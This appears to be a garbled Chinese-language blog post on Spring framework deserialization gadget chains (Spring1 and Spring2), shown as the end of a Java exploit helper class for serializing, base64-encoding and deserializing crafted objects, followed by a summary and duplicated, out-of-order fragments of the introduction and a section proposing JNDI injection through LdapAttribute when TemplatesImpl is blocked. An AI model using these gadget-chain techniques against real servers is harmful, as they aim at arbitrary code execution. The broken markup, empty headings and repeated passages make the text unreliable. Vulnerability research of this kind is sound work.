<\/span><\/span>        objectOutputStream.<\/span>writeObject<\/span>(<\/span>object);<\/span>
<\/span><\/span>        byte<\/span>[]<\/span> serializedBytes =<\/span> byteArrayOutputStream.<\/span>toByteArray<\/span>();<\/span>
<\/span><\/span>        String base64Encoded =<\/span> Base64.<\/span>getEncoder<\/span>().<\/span>encodeToString<\/span>(<\/span>serializedBytes);<\/span>
<\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>base64Encoded);<\/span>
<\/span><\/span>        
<\/span><\/span>        byte<\/span>[]<\/span> decodedBytes =<\/span> Base64.<\/span>getDecoder<\/span>().<\/span>decode<\/span>(<\/span>base64Encoded);<\/span>
<\/span><\/span>        ObjectInputStream objectInputStream =<\/span> new<\/span> ObjectInputStream(<\/span>new<\/span> ByteArrayInputStream(<\/span>decodedBytes));<\/span>
<\/span><\/span>        objectInputStream.<\/span>readObject<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> static<\/span> void<\/span> setField<\/span>(<\/span>Object object,<\/span>String fieldName,<\/span>Object value)<\/span> throws<\/span> Exception{<\/span>
<\/span><\/span>        Class<?><\/span> c =<\/span> object.<\/span>getClass<\/span>();<\/span>
<\/span><\/span>        Field field =<\/span> c.<\/span>getDeclaredField<\/span>(<\/span>fieldName);<\/span>
<\/span><\/span>        field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        field.<\/span>set<\/span>(<\/span>object,<\/span>value);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> static<\/span> <<\/span>T><\/span> T createObjWithConstructor<\/span> (<\/span>Class<<\/span>T><\/span> clazz,<\/span>Class<?<\/span> super<\/span> T><\/span> superClazz,<\/span>Class<?>[]<\/span> argsTypes,<\/span>Object[]<\/span> argsValues)<\/span> throws<\/span> Exception{<\/span>
<\/span><\/span>        Constructor<?<\/span>super<\/span> T><\/span> constructor =<\/span> superClazz.<\/span>getDeclaredConstructor<\/span>(<\/span>argsTypes);<\/span>
<\/span><\/span>        constructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        Constructor<?><\/span> constructor1 =<\/span> ReflectionFactory.<\/span>getReflectionFactory<\/span>().<\/span>newConstructorForSerialization<\/span>(<\/span>clazz,<\/span>constructor);<\/span>
<\/span><\/span>        constructor1.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        return<\/span> (<\/span>T)<\/span> constructor1.<\/span>newInstance<\/span>(<\/span>argsValues);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>总结<\/h2>

动态代理是关键<\/strong>：两条链都大量使用了Java动态代理机制，需要熟练掌握动态代理原理<\/li>
多层代理结构<\/strong>：Spring1使用了三层动态代理结构，理解每层代理的作用至关重要<\/li>
替代方案<\/strong>：当主要利用类被禁用时，可以考虑其他攻击面如JNDI注入<\/li>
防御建议<\/strong>：

升级Spring框架到安全版本<\/li>
限制反序列化操作<\/li>
使用安全防护产品检测恶意序列化数据<\/li>
<\/ul>
<\/li>
<\/ol>
理解这些漏洞需要对Java反序列化、动态代理和Spring框架内部机制有深入理解，建议先掌握这些基础知识再深入研究漏洞利用技术。<\/p>
Spring框架反序列化漏洞分析与利用<\/h1>

前言<\/h2> 本文详细分析Spring框架中的两条反序列化漏洞链（Spring1和Spring2），涵盖漏洞原理、利用条件、调用链分析以及实际利用方法。这两条链都利用了Java动态代理机制和Spring框架特性实现任意代码执行。<\/p>

环境准备<\/h2>

Spring1链分析<\/h2>

Spring2链分析<\/h2>

攻击面拓展<\/h2>

替代TemplatesImpl的方案<\/h3> 当TemplatesImpl<\/code>类被禁用时，可以考虑使用JNDI注入实现远程类加载。使用com.sun.jndi.ldap.LdapAttribute<\/code>类的getAttributeDefinition()<\/code>方法，该方法会调用lookup()<\/code>。<\/p>

前言<\/h2>
本文详细分析Spring框架中的两条反序列化漏洞链（Spring1和Spring2），涵盖漏洞原理、利用条件、调用链分析以及实际利用方法。这两条链都利用了Java动态代理机制和Spring框架特性实现任意代码执行。<\/p>

替代TemplatesImpl的方案<\/h3>
当`TemplatesImpl<\/code>类被禁用时，可以考虑使用JNDI注入实现远程类加载。使用com.sun.jndi.ldap.LdapAttribute<\/code>类的getAttributeDefinition()<\/code>方法，该方法会调用lookup()<\/code>。<\/p>`
